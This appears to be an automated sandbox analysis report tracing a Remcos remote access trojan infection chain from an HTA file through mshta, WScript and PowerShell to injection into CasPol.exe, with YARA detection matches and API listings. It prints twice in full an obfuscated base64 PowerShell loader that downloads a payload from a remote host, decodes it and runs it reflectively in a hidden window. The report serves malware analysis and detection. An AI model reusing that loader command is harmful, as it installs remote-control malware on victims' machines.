                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7604, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,18_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04669F6616_2_04669F66
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0466A8A016_2_0466A8A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041D07118_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004520D218_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043D09818_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043715018_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004361AA18_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0042625418_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043137718_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043651C18_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041E5DF18_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044C73918_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004367C618_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004267CB18_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043C9DD18_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00432A4918_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00436A8D18_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043CC0C18_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00436D4818_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00434D2218_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00426E7318_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00440E2018_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043CE3B18_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00412F4518_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00452F0018_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00426FAD18_2_00426FAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2069
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2362
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2069Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2362Jump to behavior
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7604, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/22@3/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,18_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,18_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,18_2_0041A63F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00419BC4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgwk5qel.12s.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: seethebestthignswhichgivingbestopportunities.htaReversingLabs: Detection: 21%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
